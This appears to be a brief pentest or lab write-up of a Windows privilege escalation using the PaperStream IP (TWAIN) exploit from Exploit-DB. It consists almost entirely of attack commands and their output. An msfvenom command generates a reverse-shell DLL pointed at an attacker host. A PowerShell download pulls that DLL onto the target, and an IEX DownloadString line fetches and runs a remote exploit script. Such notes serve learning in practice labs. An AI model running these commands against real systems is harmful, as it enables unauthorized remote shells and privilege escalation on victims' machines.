6 privesc_1 PaperStream IP (TWAIN)
Last updated
Last updated
Using https://www.exploit-db.com/exploits/49382
msfvenom -p windows/shell_reverse_tcp -f dll -o k.dll LHOST=192.168.49.105 LPORT=445
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 8704 bytes
Saved as: k.dll
C:\Users\tony\Documents> powershell.exe -c wget 192.168.49.105/k.dll -Outfile k.dll
# saved on target
# call it
powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.105/49382.ps1')
Writable location found, copying payload to C:\JavaTemp\
Payload copied, triggering...